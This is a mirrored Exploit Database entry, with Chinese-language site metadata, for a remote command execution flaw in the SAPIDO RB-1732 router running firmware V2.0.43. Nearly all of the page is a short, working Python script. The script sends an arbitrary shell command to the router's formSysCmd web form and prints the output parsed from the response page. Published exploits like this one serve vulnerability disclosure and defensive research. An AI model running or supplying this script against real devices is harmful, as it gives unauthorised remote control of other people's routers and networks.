SAPIDO RB-1732 – Remote Command Execution

• Exploit Database
• 101 阅读

• 作者： k1nm3n.aotoi
  日期： 2019-06-25
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/47031/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  # Exploit Title: SAPIDO RB-1732 command line execution # Date: 2019-6-24 # Exploit Author: k1nm3n.aotoi # Vendor Homepage: http://www.sapido.com.tw/ # Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732_TC_v2.0.43.bin # Version: RB-1732 V2.0.43 # Tested on: linux   import requests import sys def test_httpcommand(ip, command): my_data = {&apos;sysCmd&apos;: command, &apos;apply&apos;: &apos;Apply&apos;, &apos;submit-url&apos;:&apos;/syscmd.asp&apos;, &apos;msg&apos;:&apos;&apos;} r = requests.post(&apos;http://%s/goform/formSysCmd&apos; % ip, data = my_data) content = r.text content = content[ content.find(&apos;<textarea rows="15" name="msg" cols="80" wrap="virtual">&apos;)+56: content.rfind(&apos;</textarea>&apos;)] return content print test_httpcommand(sys.argv[1], " ".join(sys.argv[2:]))